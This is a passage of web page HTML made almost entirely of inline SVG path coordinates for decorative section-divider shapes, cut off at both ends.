d=\"M918.1,44.8c-.4-.3-3.5.4.4.8C920.8,45.7,917.5,45,918.1,44.8Z\"></path>\n <path d=\"M932.9,47.4c-3-.3-9.8-1.8-10.4-1.5C923.8,46,933.6,48.2,932.9,47.4Z\"></path>\n <path d=\"M1107.8,76c1,.2,2.1.3,3.1.5-.1-.2-.1-.3-.2-.5C1107.9,75.5,1108.1,75.8,1107.8,76Z\"></path>\n <path d=\"M917.7,39.7c1.3,0,6.2.4,1.7-.5.8.4-.2.4-3-.2C916.7,39.2,916.3,39.4,917.7,39.7Z\"></path>\n <path d=\"M1102.9,67.5c-.7-.3.9-.4-1.3-.8.3.3-.7.2-3-.2.7.3-.9.4,1.3.8C1099.2,66.9,1100.9,67,1102.9,67.5Z\"></path>\n <path d=\"M918.2,36.5c-2-.3-3.9-.6-5.3-.9a5.19,5.19,0,0,0-1.1-.2c.3.1.7.2,1.1.3,1.6.4,3.9.9,5.5,1.3C918.3,36.9,918.3,36.7,918.2,36.5Z\"></path>\n <path d=\"M1115.1,66.7l-2.1-.3c-.6-.1-1.2-.2-1-.1,3,.6.4.6-.8.4,2.9.5,2.2.6,4.2.7C1114.3,67,1114.3,66.9,1115.1,66.7Z\"></path>\n <path d=\"M913.8,33.4c0-.4.4-.5-.8-.9a10.78,10.78,0,0,0-1.7-.4c-1.9-.2-.8.6,1.7,1.2A2.18,2.18,0,0,1,913.8,33.4Z\"></path>\n <path d=\"M915.7,33.3c2.7.4,4,.5,4,.2-1.4-.3-2.1-.5-4.2-.8A1.42,1.42,0,0,0,915.7,33.3Z\"></path>\n <path d=\"M926.2,32.9c-.1-.2,2.8.3,1.9-.1a41.72,41.72,0,0,0-4.3-.8Q923.8,32.3,926.2,32.9Z\"></path>\n <path d=\"M1105.1,61.9c2.6.4,5.6.4,1.8-.3C1106.6,61.8,1104.8,61.5,1105.1,61.9Z\"></path>\n <path d=\"M925.4,31.2c-3.5-.5-4-.3-4.9-.1,2,.3,2.4.5,4.2.8C924,31.3,923,31,925.4,31.2Z\"></path>\n <path d=\"M1109.9,61.9c-3.9-1,1.7-.2-2.4-1.1-1.1,0-1.1.3-1.7.5C1107.8,61.7,1108,61.6,1109.9,61.9Z\"></path>\n <path d=\"M1218.5,78.8c-1.6.1.8.6.5,1.1C1220.7,80.1,1220.3,79.2,1218.5,78.8Z\"></path>\n <path d=\"M1108.5,60.9c1.4.1,1.5-.4-1.4-.9C1107.8,60.3,1106.2,60.5,1108.5,60.9Z\"></path>\n <path d=\"M919.6,29.2c2.5.1-.3-1.3,3.5-.9,0-.3-1.8-.6-3.4-1C922.4,28.3,916,28.1,919.6,29.2Z\"></path>\n <path d=\"M934,30.9c-3-.3-6.8-.9-1.9.1.1.1.2.2,1.1.3C932.2,30.9,934.5,31.3,934,30.9Z\"></path>\n <path d=\"M929,28.6c.1.3-1.6.1-.7.5,2.6.5,5.1.9,5.1.6-1.2-.2-3-.5-3.2-.6S930.2,28.8,929,28.6Z\"></path>\n <path d=\"M921.6,27.2c1.8.1-.5-.5-3.4-1C918.8,26.5,918.8,26.8,921.6,27.2Z\"></path>\n <path d=\"M1203.4,73.4c-2.8-.5-3.4-.4-2.9,0a28.64,28.64,0,0,1,3.2.6C1203.4,73.7,1201.5,73.3,1203.4,73.4Z\"></path>\n <path d=\"M923.6,27.3c1.4.2,2.8.5,4.2.7l-.3-.6C923.6,26.7,922.9,26.8,923.6,27.3Z\"></path>\n <path d=\"M927.4,27.2c1.1-.1,3.3.2,3.9,0C928.4,26.7,924.4,26.4,927.4,27.2Z\"></path>\n <path d=\"M1211.4,74c1.4.2,2.3.4,3.2.6.1-.3-.5-.7-2.4-1.1C1212.6,73.9,1212.2,74,1211.4,74Z\"></path>\n <path d=\"M940.7,26.7c1.4.6.8.5-1.8.3a17.9,17.9,0,0,0-3.3-.9c1.6.8,4.8,1.3,2.6,1.4,1.3.3,2.9.6,5.3,1,.9-.3-4-.8-3.4-1.1a10.38,10.38,0,0,0,4,.3C941.3,27.3,944.8,27.2,940.7,26.7Z\"></path>\n <path d=\"M915.4,22.2c-.9,0-2.4.6,1.5,1.1C914.2,22.6,918.4,22.9,915.4,22.2Z\"></path>\n <path d=\"M916.9,17.2a5.13,5.13,0,0,0-2.4-1.1C913.7,16.1,913.7,16.7,916.9,17.2Z\"></path>\n <path d=\"M933.2,18.8a13,13,0,0,1-3.1-.4c2.8.8-1,.5-4-.2-1.1.2,7.2,1.5,7.4,1.3C929.7,18.8,936.9,19.5,933.2,18.8Z\"></path>\n <path d=\"M921.3,16.2c0,.3,3.1.8,4.4,1.2-.1-.2.4-.2.9-.2C923.7,16.8,923.8,16.5,921.3,16.2Z\"></path>\n <path d=\"M924.5,14.7c1.1.4.3.6,3.4,1.1C928,15.5,927.7,15.2,924.5,14.7Z\"></path>\n <path d=\"M921.5,12.4c3.3.6,3.2.3,2.9-.1C921.1,11.8,922.4,12.4,921.5,12.4Z\"></path>\n <path d=\"M915,11c-.5-.2-.7-.4-1.4-.7-.3-.1-.6-.2-1-.3-.1.1-.2.2-2-.1-.1.2,1,.5,3,.8Z\"></path>\n <path d=\"M917.9,8.8a14.08,14.08,0,0,1-4.2,0c-.5-.1-1-.1-1.7-.2a8.24,8.24,0,0,0,1.7.4,40.71,40.71,0,0,1,5.7,1C915.9,9,923,9.9,917.9,8.8Z\"></path>\n <path d=\"M936.8,41.2c-.7-.4-1.6-.7.8-.4-1-.3-3.5-.7-5.4-1.1C931.3,40,935.2,40.7,936.8,41.2Z\"></path>\n <path d=\"M960,57.7c-.9-.6.4-.5,1.7-.5-3.3-.6-6.5-1.3-8.6-1.9A54.15,54.15,0,0,1,960,57.7Z\"></path>\n <path d=\"M940.2,58.9c-6.6-1.5.2-1.1-4-2.3-1,.3.4,1.3-5.7.3,5.2.9-.8.3-.8.4,6.2,1.1,1.2,1.2,3.9,2.2-4.4-.7-2.1-.1-.7.7-5.1-1-3.2-.1-6-.4,11,2.5,1.7,2.2-.6,2.3.8.1,3,.7,4,.9-.2.2-7.4-.9-3.8,0,1.1.1.1-.4,3,.2.3.4.9,1-1.6.6,1.6.4,3.4.7,3.4,1a8.57,8.57,0,0,1-3.9-.1c1.8.2-1.3.6,1.3.7,6.9-.1,5.9,3.4-2.1,1.8.7.4,4.5,1,4.5,1.4-2.6-.2-2.3.3-5.9-.2.2.7,3.6,1.6-.4,1.3a39.83,39.83,0,0,0,5.2.8c1.2.5,3.4,1.2.4.8a13.18,13.18,0,0,0-5.4-1.1c2.7.7.4,1.2-.4,1.2,1.1.5,3.3.5,5.2.9a4.54,4.54,0,0,0,1.5.6l3.1.9a28.05,28.05,0,0,1-2.9,0c-1.2-.3-1.9-.6-2.8-.9a14.13,14.13,0,0,0-1.8-.5c.9.3.8.4.5.5s-1.3.1,0,.6c2.5.6,3.8.3,4.2.7-.5.5-3,.1-1.6.7,1.4.2,2.8.5,4.2.7.5-.5.1-.7.5-1,1.6.2,3.9.7,4.1.6-3.1-.8-3.9-1.9,2.5-.8,1.2.8.1.8.8,1.7,2.2.5,5.5,1.3,5.2.8-1.2-.2-3.9-.8-4.5-1.3,2.7,0,2.4-.9,1.1-1.7-1.6-.1.2.2.2.5-1.4-.2-2.3-.3-3.1-.4a7.85,7.85,0,0,1-1.6-.7,31.76,31.76,0,0,0-4.5-1.9c0-.6,5.5.6,5.8,0-6.4-1.2-5.1-1.5-4.9-2.1,1.1.2,2.1.4,3.2.5-2.9-.9,1.3-.5-3.8-1.9,1.4.2,2.3.3,3.1.4,2.9.7,4.9,2.9-.2,1.8,3.6,1.4,6.5,2.4,3.2,2.8,1.2.1,2.4.5,3.2.6a4.24,4.24,0,0,0,1,.1h-.1c-1.7-.8-2.1-1.4.4-1.4-5.7-1.2-3.5-1.8.3-1.4,0,.3.1.6,2.4,1,3.2-.1,4.4-.1-.7-1.6-.8.2,3.6,1.4.5,1.1a14.53,14.53,0,0,1-3.3-.9c2.4.1,1.4-.1.6-.7,4.6.9,2.7,0,5,.3-2.2-.6-4.4-.5-5.3-1.1,1-.3-2.7-1.3,1.5-1,1.7.4,2.1.8,4.5,1.3.4-.3-3.9-.9-3.5-1.2,2.8.5,2.6.2,2.9,0-3.7-1.2-1.1-1.7-6.2-3,2,.2,1.2-.3,2.8-.2-.2.2.5.5,2.3.8-4-1.3,1.1-1.4-6-2.6-.7-.6,6,.3,2.6-.7-.2.1.1.2-.9.1.1-.2-1.3-.5-1.3-.7,4.6.6-1.6-1.4,3.5-.9-4.3-.6-2.1-.8-4.5-1.3a30.26,30.26,0,0,0-5.2,1.4c-2.3-1.1-1.8-1.5-2.1-2.3C937.7,58.3,940.4,59.4,940.2,58.9Z\"></path>\n <path d=\"M926.2,62h.3C926.3,61.9,926.1,61.9,926.2,62Z\"></path>\n <path d=\"M913.6,49.6c1.7.1.9-.4-1-.9q-.6-.15-1.5-.3a6,6,0,0,1,1.5.5C912.9,49.1,912.2,49.1,913.6,49.6Z\"></path>\n <path d=\"M1035.1,69.6C1041.3,70.1,1032.4,67.8,1035.1,69.6Z\"></path>\n <path d=\"M1016,63.9c-.8.5,1.8,1.7,4.9,2.3C1017.9,65.4,1019.7,64.8,1016,63.9Z\"></path>\n <path d=\"M958.7,54.9c3,.4,3.2.4,6.3,1,1.3-.3-6.1-1.1-5.5-1.5.6.1,1.1.1-.1-.1C955.8,54.1,960.5,55,958.7,54.9Z\"></path>\n <path d=\"M968.6,55.7c-3.2-.6-3.8-.5-6.2-.9.3-.2,2.1-.3-1.4-.9-1.4-.1-.4.5-1.8.4,4.5.6,2.4.8,6.5,1.4C964,55,970.4,56.4,968.6,55.7Z\"></path>\n <path d=\"M990.8,59.6c2.6.2,1.8-.5.6-.8a7.46,7.46,0,0,1-2.1-.3C992,59.3,988.1,59,990.8,59.6Z\"></path>\n <path d=\"M928.4,46c-.7-.1-4.2-1-4.2-.7a15.58,15.58,0,0,1,3.3.8c0-.3,4.9.7,3.9.1A61.65,61.65,0,0,0,924,45C926.8,45.4,928.6,45.8,928.4,46Z\"></path>\n <path d=\"M917.2,42.7a32.38,32.38,0,0,0-4.4-.5,8.55,8.55,0,0,0-1.6,0,5.22,5.22,0,0,1,1.6.4,24.81,24.81,0,0,0,2.8.8c-.5-.3-1.5-.7-2.4-1.1C914.9,42.5,918.4,43.2,917.2,42.7Z\"></path>\n <path d=\"M932.9,45.2c.4-.2-3.1-1.1-3.3-.9,2.4.4.2.6,3.4,1.1,0-.3,4,.5,4,.2a21,21,0,0,1-2.2-.6C935.2,45.4,934.7,45.5,932.9,45.2Z\"></path>\n <path d=\"M927.4,43.8a45.32,45.32,0,0,1-7.4-1.3c-.8.3-.2.5,2.5,1.2a17.9,17.9,0,0,1,4,.3,1.83,1.83,0,0,0,1.1.2C925.7,43.9,927.7,44.1,927.4,43.8Z\"></path>\n <path d=\"M914.6,41.3c4.4.8-1,.2,2.4,1-.1-.2,2.8.3,1.9-.1C916.3,41.8,916,41.1,914.6,41.3Z\"></path>\n <path d=\"M913,39.9h-.2c-1.3-.2-2.1-.3-2.9-.4a1.65,1.65,0,0,0-1-.2c2.6.4,1.2.6,4,1a.79.79,0,0,1,.4.1C914.8,40.4,913,40.2,913,39.9Z\"></path>\n <path d=\"M1110,68.2a8.32,8.32,0,0,1-2.1-.3,47.53,47.53,0,0,0,5.6,1.7C1112.2,69.1,1112.9,68.8,1110,68.2Z\"></path>\n <path d=\"M1110.9,68.2c-.6-.1-1.3-.2-1.1-.3-.1-.2,1.8.2,2,.1-2.5-.8-5.9-.7-2.9,0C1107.8,67.5,1114.3,69,1110.9,68.2Z\"></path>\n <path d=\"M914.9,35.7c0-.3-.3-.7-1.9-1.1-.2,0-.4-.1-.6-.1.3.1.4.2.6.2.4.2.4.2,0,.2-.7,0-2.2-.3-3.4-.3a26.29,26.29,0,0,1,3.4.7A11.06,11.06,0,0,1,914.9,35.7Z\"></path>\n <path d=\"M1108.1,64.3c-6.2-1.3,3.4-.4-2.7-1.7-1.6.5-3.4,1.2-3.8,2.3C1107.1,65.3,1102.6,63.7,1108.1,64.3Z\"></path>\n <path d=\"M929.5,31.6c.8.2,1.3.3,1.2.4-1.8-.3-6.1-.8-3-.2C930,32.3,933.8,32.1,929.5,31.6Z\"></path>\n <path d=\"M916.6,29.1c2.9.7-2.7.2.4.8.9-.1,1.9-.1,2.8-.2C917.1,29.4,917.6,28.8,916.6,29.1Z\"></path>\n <path d=\"M1223.2,80.6q2.4-.75,3-1.8c-3.4-.6-1.1-.8-5.5-1.5C1227.7,79.1,1219.5,79.2,1223.2,80.6Z\"></path>\n <path d=\"M913.1,27.8a16.64,16.64,0,0,0-2-.1,11.37,11.37,0,0,0,2,.3,19,19,0,0,1,3.2.3c.7-.1-1.6-.6-3.2-.9a6.86,6.86,0,0,0-1.2-.1c.5.1.8.1,1.2.2C914.8,27.9,914.2,27.9,913.1,27.8Z\"></path>\n <path d=\"M1113.5,59.1c-7.1-.8,3.5,0-4.5-1.3-1.2.8-2.2.5-1.3,1.3C1111.2,59.4,1109.6,58.9,1113.5,59.1Z\"></path>\n <path d=\"M937.1,29.3a47.91,47.91,0,0,0-6.1-.6c.7.1,4.2,1,4.2.7C931.4,28.7,937.7,29.7,937.1,29.3Z\"></path>\n <path d=\"M1114.4,56.8a10.11,10.11,0,0,1-3-.3c.1.3,2,.7,1.4.9-3.1-.5-.5.1-4-.3,2.9.4-2.4,0,1.3.7,0-.2,3.4.5,3,.2a10.32,10.32,0,0,1-2.2-.5c1.6.2,3.9.7,4.1.6-2.9-.7,3-.3-1.5-1.1C1115.1,57.2,1116.2,57.2,1114.4,56.8Z\"></path>\n <path d=\"M935.2,25.3c-.3.2,2,.6,1.3.8,5.2.9.4-.3,2.9,0s1.3.5,3.3.9C943.3,26.4,936.9,25.7,935.2,25.3Z\"></path>\n <path d=\"M1109.9,53.4c4.6.7,3,.9,2.9,1.2-.5.1-.6.2-.1.4h1.3a4.42,4.42,0,0,0,.5.1c-.1,0,0-.1-.1-.1h1a10.52,10.52,0,0,1,1.1.3c0-.2.2-.3.3-.4.9-.1,1.1-.3-.3-.5-.3,0-.6.1-1,.1a11.26,11.26,0,0,1-1.4-.3c.5-.4,2.4.1,3.9.1-1.7-.2-7.2-1.6-5.4-1.1C1115.4,53.9,1111.7,53.6,1109.9,53.4Z\"></path>\n <path d=\"M919,17.6c1.4.3,2.1.5,4.2.8,2.1,0-1.4-.8,1.7-.5C921.8,17.7,919.7,17.1,919,17.6Z\"></path>\n <path d=\"M915.4,13.8c-.4.7,0,.7,2.6,1.4C918.8,15.4,916,13.8,915.4,13.8Z\"></path>\n <path d=\"M930.3,16.8a43.92,43.92,0,0,0-7.3-1.1c1.9.3,6.6,1.2,7.4,1.3C929.1,16.8,929.7,16.8,930.3,16.8Z\"></path>\n <path d=\"M921.6,10.5c3,1.2-5.7-.2-1.5,1C919.7,11,927.3,11.8,921.6,10.5Z\"></path>\n <path d=\"M1610.4,41.7c1.3-.6-.6-.4-3.6-.6-.1-.1-.2-.1-1.1-.1.1.1.1.2.2.3C1610.6,41.1,1608.7,42.1,1610.4,41.7Z\"></path>\n <path d=\"M1599.6,41.3c1.8,0,3.3.1,4.3.2C1604.4,41.1,1599.1,40.8,1599.6,41.3Z\"></path>\n <path d=\"M1575.5,44.5c-.8.4,1.8,1.1,4.7.8C1575.8,45.1,1580.3,44.7,1575.5,44.5Z\"></path>\n <path d=\"M934.8,31.5a24.37,24.37,0,0,1-2.7-.1c-1.9-.3-2.4-.6-5-1a17.39,17.39,0,0,0,3.9.9h-1.4c-.1.3,2.4.3,4.5.4C933.8,31.6,934.2,31.5,934.8,31.5Z\"></path>\n <path d=\"M916.9,31.4c1.1,0,2.1,0,3.2.1.8-.3-3.4-.2-5.5-.3,1.1.2-.4.3-1.2.4-.1,0-.2-.1-.4-.1h-.1c0,.1.1.2.1.3s.1.2.2.3c1.6.3,2.7.6,4.3.9-1-.5,1.3-.1.8-.4-3.5-.7-.6.3-4.1-.5-.2-.1,0-.3-.4-.4H915C916.7,31.7,915.4,31.4,916.9,31.4Z\"></path>\n <path d=\"M1598.8,48c.3.7,1.4.8.9,1.3C1603.6,49.2,1601.2,48.2,1598.8,48Z\"></path>\n <path d=\"M1592.1,49c.7.4,0,.6-.5.9C1595,49.9,1595.8,49.1,1592.1,49Z\"></path>\n <path d=\"M1517.1,49.7c-4.1,0-3-.5-5.7-.7.8.5.9.7,3.9,1.2C1516.3,50.1,1516.1,49.9,1517.1,49.7Z\"></path>\n <path d=\"M1681.5,54.1c2.2-.1-.6-.7-2.6-.8C1681,53.7,1678.1,54.1,1681.5,54.1Z\"></path>\n <path d=\"M1561.2,51.4c1.9.6-.8,1.2.2,1.9,2.6.1,5.1.1,6.3,0C1563.5,52.8,1568.4,51.8,1561.2,51.4Z\"></path>\n <path d=\"M1514.2,54.9c.7.4-.8.9,2.8,1C1514.1,55.5,1518.7,55.1,1514.2,54.9Z\"></path>\n <path d=\"M1488.4,55.5c5.5,0,3.5.6,7.8.7-2.8-.6-3.3-.9-2.9-1.3C1492.4,55.2,1489.3,55.2,1488.4,55.5Z\"></path>\n <path d=\"M1568,56.9a20.32,20.32,0,0,0-4.6-.5A9.14,9.14,0,0,0,1568,56.9Z\"></path>\n <path d=\"M1516,56c-1.7.1-.6.6,1.5.7-.1-.1,1.8-.1,2-.2C1515.4,56.6,1518.8,56.1,1516,56Z\"></path>\n <path d=\"M1471.7,55.6c-1.4,0-2.8-.1-4.3-.1a5.58,5.58,0,0,0,2.6.8C1472.3,56.2,1472.3,55.9,1471.7,55.6Z\"></path>\n <path d=\"M1474.6,56.8c-2-.4,3.4-.8-1.6-.9,1.4.6-.8.7-2.5.9C1472.5,56.9,1472.7,56.8,1474.6,56.8Z\"></path>\n <path d=\"M1519.1,57.6c-2.5-.1-2.6-.3-1.4-.5-1.1,0-2.1,0-3.2-.1C1513.4,57.5,1517.5,57.9,1519.1,57.6Z\"></path>\n <path d=\"M1570.1,58.6c.1.2-2.4.6.5.8C1570.5,59.2,1573.1,58.8,1570.1,58.6Z\"></path>\n <path d=\"M1517.2,57.9c.4.4,1.2.7,4.7.8C1521.4,58.3,1518.7,58.2,1517.2,57.9Z\"></path>\n <path d=\"M1418,56.7c2.3.1,2.5.3,2.5.6,1.6,0,3.9.1,4.2,0-3.3-.2-3.6-.4-1.4-.6A29.32,29.32,0,0,0,1418,56.7Z\"></path>\n <path d=\"M1565.7,59.8c.2.6,6.9.3,7.4,0C1569.6,59.7,1569.4,60,1565.7,59.8Z\"></path>\n <path d=\"M1514.9,59.2c5,.2,4.7.1,8.6.4,0-.1.1-.1,1-.1,0-.1-.1-.1-.1-.2C1521.7,59.2,1516.5,58.9,1514.9,59.2Z\"></path>\n <path d=\"M1401.7,57.6c-2.5.7,13.8.6,9.6.2C1409.8,58,1403.9,57.7,1401.7,57.6Z\"></path>\n <path d=\"M1481.8,59.7c-.5.2-1.4.2-1.8.4,2,0,2.4.2,4.3.2C1484.3,60,1484.1,59.8,1481.8,59.7Z\"></path>\n <path d=\"M1537,60.9c-.1.5-1.2.7.7,1,.9-.2,4.6-.1,3.9-.5C1539.9,61.3,1540,61,1537,60.9Z\"></path>\n <path d=\"M1190,54.5c.1-.2,1.6-.2,1.9-.3-5.3.1-2.5-.2-6.5-.4,2.6.5-1,.7-.2,1.3,4.2.1,11.3-.3,5.8-.8C1191.2,54.6,1190.7,54.7,1190,54.5Z\"></path>\n <path d=\"M1516.7,61.8a8.24,8.24,0,0,0-3.6-.7C1513.7,61.4,1513.4,61.8,1516.7,61.8Z\"></path>\n <path d=\"M1395.9,59.9c4.2.2,6.4-.3,3.8-.6C1400.2,59.7,1396.4,59.6,1395.9,59.9Z\"></path>\n <path d=\"M1474.1,63.9c4.2-.5,8.4-1.6,4.5-2.7C1479.7,62.3,1473.1,63.1,1474.1,63.9Z\"></path>\n <path d=\"M1355.1,60.1c-4.5,0-1.6-.7-6.7-.7,2.2.5,6.2,1.2.9,1.4,1.7.2,4.6.1,6.4.1C1353.9,60.6,1355,60.5,1355.1,60.1Z\"></path>\n <path d=\"M1360.4,60.1h-2.1c.1.1-.8.1-.9.2,2.1.1,2.8.3,5.5.3,1.4-.4-3.7-.1-3.4-.4C1360,60.2,1360.6,60.2,1360.4,60.1Z\"></path>\n <path d=\"M1114.1,55.5a60.9,60.9,0,0,0-7.4,0c2.8.3,2.8.6-.6.6C1112.2,56.5,1113.4,56,1114.1,55.5Z\"></path>\n <path d=\"M1295.9,59.3c.7.2-.9.6,1.5.7C1298.2,60,1299.7,59.3,1295.9,59.3Z\"></path>\n <path d=\"M1452.1,64c-.8-.3-1.3-.6-4.6-.6C1445.9,63.5,1448,64,1452.1,64Z\"></path>\n <path d=\"M1451.1,64.1c-.1.4,2.6.5,3.6.7,1.9-.2-1-.3-.4-.7Z\"></path>\n <path d=\"M1563.4,80.3c-1.6.1-.1.5,1.5.7C1565.7,80.9,1567.2,80.2,1563.4,80.3Z\"></path>\n <path d=\"M1551,82.2c.1.5-2.5.7-3.5,1.1a23.4,23.4,0,0,0,6.2-.1c-1.2-.1-2.3-.3-3.4-.4C1552.3,82.9,1554.5,82.1,1551,82.2Z\"></path>\n <path d=\"M1535.9,89.5h0c5.3-.1,8-.5,9.8-1-2.3-.2-4.7-.1-7.6-.4C1539.5,88.8,1533,89,1535.9,89.5Z\"></path>\n <path d=\"M1400.3,58.5a16.38,16.38,0,0,0,2.2.3C1401.9,58.7,1401.1,58.6,1400.3,58.5Z\"></path>\n <path d=\"M1616.7,41.6c-1.3,0-2.5,0-2,.2,6,.1,2.4-.5,1.7-.6C1615.2,41.3,1615.3,41.5,1616.7,41.6Z\"></path>\n <path d=\"M1591.6,41.9c.2-.5,7.7-.2,2.7-.7,2.6-.1,10-.6,2.5-.9C1595.2,40.7,1590.5,41.4,1591.6,41.9Z\"></path>\n <path d=\"M1594.6,43.3c1.8-.3.8-1.3,6.8-.8,0-.3-3.2-.3-4.5-.5-1.4,0,.1.4-1.8.4-1.3,0-1.3-.2-1.3-.4a37.36,37.36,0,0,0-4.1.1c5,0,1.3.5,4.8.9a28.68,28.68,0,0,1-5.4-.2c0-.1,1.3-.1.9-.3-4.5.2-3-.4-6.7-.6-2.1.2,1,.4,2.5.6a19.52,19.52,0,0,1-5.9.6c-.1-.2-1-.3-2.3-.4-1.1.1-3.3.2-2.8.5,2.6.1,2.2-.2,5.2,0-3.1.2,1.1.5-4,.2-.2.3-1.8.4.4.7,2.1-.1,4.2-.1,6.2-.2-1.6-.1-1.2-.3-1.4-.5,3.3.2,1.7-.2,1.8-.4h3.1c.1.3.9.6,2.6.8.5-.3,3.1-.1,4.3.1.2-.3,6.9-.3,3.7-.7A7,7,0,0,1,1594.6,43.3Z\"></path>\n <path d=\"M1695,42.7c-1.3.4-3.1.7-7,.5,2,.1,1,.4,3.4.4,1-.2,4.2.2,5.2-.1C1691.4,43.3,1697.6,42.9,1695,42.7Z\"></path>\n <path d=\"M1564,54.1c3.9.3,3.2,1.4,3.3.2-.3-.2-4.1-1-2.5-.6C1565,53.9,1564.8,54,1564,54.1Z\"></path>\n <path d=\"M1473.5,55a5.11,5.11,0,0,0,2.4.5c3.8,0-3.3-1.5,4.7-.9-.3-.4-2.3-.9-1.5-.7-.7.4-2.3,0-4.3-.1C1472,54.2,1478.2,55,1473.5,55Z\"></path>\n <path d=\"M1301.6,58.5c.2.1,1.5.2,1.3.4a7.36,7.36,0,0,0-3.1,0c1.7,0,.8.3,2.3.4C1303.9,59.1,1304,58.3,1301.6,58.5Z\"></path>\n <path d=\"M1498.8,64.8c1.1.1,4,.1,3.4.4-.6,0-1.2.1.1.1.7-.3,1.5-.1,4.2,0,1.4-.4-3.7-.1-3.4-.4,1.8,0-1.6-.4,3-.3,2.7.1,1.8.5,4.5.5,1.7-.1-.1-.6,1.6-.7-5.3,0-3.6-1.5-10.7-2C1499.8,63.4,1501,64.2,1498.8,64.8Z\"></path>\n <path d=\"M1492.8,65.3a18.25,18.25,0,0,1-3.3-.3c-2.4.2,1.9.3,2.5.6-.4,0-5.1.1-2,.2,1.4,0,1.4-.1,3.1,0C1493,65.4,1491.2,65.5,1492.8,65.3Z\"></path>\n <path d=\"M1567.4,82.7c.4-.3.1-.5-3.8-.6-.2.2-.1.3,0,.5-11.8.6-10.3,2.7-18.2,3.8,3,.1,2-.2,4.1-.1,2.9.4-.3.6.7,1,3.8-.2,6.4-.5,8.9-.8,2.3.1,3.2.3,6.5.4C1570.7,85.8,1580.1,83.8,1567.4,82.7Z\"></path>\n <path d=\"M1541.6,87c1.1.2,4.4.2,3.6.6-4.3,0-5.3-.2-6.6-.5,1,.4-1.6.3-.6.6,5.3.1,6.7-.2,10.3-.2a6.85,6.85,0,0,1-2.7-.9A15,15,0,0,0,1541.6,87Z\"></path>\n <path d=\"M1349.4,59.4c3.9.3.4-.4,3-.3-.7.7,3.9.3,1.6.9,6.3-.1,3.7-1.3-2.1-1.6.4-.3,4.1-.7,1.5-1a12.2,12.2,0,0,1-6-1.2c1.6,0,4,.1,4.2,0-8.7-.2-4.5-1.6-8.6-1.9C1343.5,56.1,1351.5,57.7,1349.4,59.4Z\"></path>\n <path d=\"M1448.4,72.8c1.8,0,3.5.1,5.3.1,6.1-.5-3.1-1.7,2-1.8-7.4-.3-3.4-1-8.2-1.4,2.5-.2,5.2.2,6.2-.1-1.6-.5-8.1-.6-8.2-1.3,2.1,0,1.1-.3,4.1-.1-1.7-.5-.6-.5.5-.9-7.1-.5-.5-1.9-9-2.5,2.5.9,7.8,3.1-.9,3.4a14.08,14.08,0,0,0-4.2,0c1.6.1,4.2.2,3.5.5-12.8.2-2,2.7,2.3,3.5-1,0-2.07,0-3.1,0,4.2.3,5.2.8,9.1,1.1C1449.8,73.2,1449.3,73,1448.4,72.8Z\"></path>\n <path d=\"M1579.1,77c-1.8,0,.4.5-1.8.5s-1.5-.3-4.4-.3c.9.3-2.1.2-3,.3,2.5.7-.3.7-2.5,1,.5.2,3,.3,3.5.5-2.3.4-6.6.5-7.7,1,6.4.2,5.1-.2,11.5-.1.5-.3-.2-.8,2.6-.8-.6.4,1.3.5,3.6.6-.7-.4-.7-.8,2.7-.7C1583.3,78.2,1581.9,77.6,1579.1,77Z\"></path>\n </svg>\n </div>\n <div class=\"h-separator\" style=\"height: 121px; bottom: 0px;\">\n <svg style=\"fill:white;transform:rotateX(180deg);\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1920 120.77\" preserveAspectRatio=\"xMidYMax slice\">\n <path d=\"M569.37,67.57c1.56,0,2.79.05,4,0,1.43-.07,2.86-.24,4.29-.36A24,24,0,0,0,574,64.28C570.65,62.58,569.09,63.81,569.37,67.57Z\" transform=\"translate(0 0)\"></path>\n <path d=\"M571.07,60.51l-3.93-.7-.24,3,4.09-.37C571,61.82,571,61.17,571.07,60.51Z\" transform=\"translate(0 0)\"></path>\n <path d=\"M602,70.4c1.74.47,3.51.81,5.28,1.17l.39-2.1-5.51-.87A9.61,9.61,0,0,0,602,70.4Z\" transform=\"translate(0 0)\"></path>\n <path d=\"M474.07,102c-2.15-.7-4.42-1-5.84,2.23,2.34.53,4.31,2.49,6.5.22A2.79,2.79,0,0,0,474.07,102Z\" transform=\"translate(0 0)\"></path>\n <path d=\"M799.31,23c-.71-.12-1.29-1-2-1.17-1.14-.21-3.19-.42-3.36,0a12.07,12.07,0,0,0-.71,4.87,4.59,4.59,0,0,0,3.1.52c2.12-.83,3.24-.36,3.73,1.81.19.88.13,1.95.62,2.58a5.36,5.36,0,0,0,2.64,1.81c.37.1,1.11-1.18,1.63-1.76C803.7,28,804.22,23.75,799.31,23Z\"\n transform=\"translate(0 0)\"></path>\n <path d=\"M13.9,65.4l-.6-1.25c-1.06-2.59,1-4.49,4.66-4.33,8.51-.84,17-1.62,25.52-2.54,2.1-.23,4.14-1.27,6.22-1.3A66.38,66.38,0,0,1,58,56.8l1.31-.23A7.68,7.68,0,0,1,67,54.46a3.11,3.11,0,0,0,2.58-.66,5.37,5.37,0,0,1,6.17-1.43,2,2,0,0,0,1,.2q8.63-1.38,17.24-2.8c2.43-.4,4.84-1,7.29-1.15s5.08-.07,7.63-.08l17.77,0c.67,0,1.66.31,2,0,2.76-3,5.81-1.26,8.83-.74,3.65.63,4.85-.35,5.7-3.95.24-1,1.18-2.59,1.78-2.58a4.87,4.87,0,0,1,3.17,1.67c1.67,1.9,2.95,4.14,4.57,6.09a4.51,4.51,0,0,0,2.55,1.41,24.07,24.07,0,0,0,6.73.53c6.42-.86,12.56.17,18.8,1.53,3.93.85,8.09.6,12.13,1,3.2.33,6.38.93,9.58,1.41l14,2.19c1.59-.23,3.22-.8,4.77-.64,5.65.6,11.29,1.4,16.92,2.21,1.75.25,3.44.88,5.2,1.13,3,.41,6,1.06,9,.87s5.86-.94,8.74,1.16c.81.59,3.42-.53,4.71-1.52,1.76-1.35,3-1.64,5.11-.57,2.44,1.22,5.3,1.6,8.24,2.42.28-2.43.38-4.31.76-6.12a2.21,2.21,0,0,1,1.5-1.47c.49,0,1.26.79,1.54,1.4,1.48,3.31,3.71,4.81,7.51,4.46,4.43-.41,8.85-1.07,13.27-1.57A4.73,4.73,0,0,1,306,59c5.66,2.7,11.74,3.44,17.88,3.9.11,0,.25,0,.33,0,4.79,3.34,10.15,4.24,15.85,3.8.12,0,.26.33.4.51l1.34.53,2.1,1.4,2.6-1.71c.92-.41,1.93-1.31,2.73-1.16,1.83.36,3.65.81,5.48,1.14,4.16.74,8.33.8,12.54-2.69L366,69.46l5.8-2.54,5.48-2.41c-3.7-1.64-4.16-4.87-4-8.14a5.29,5.29,0,0,1,.88-2.44c1.07,1.15,2.13,2.3,3.21,3.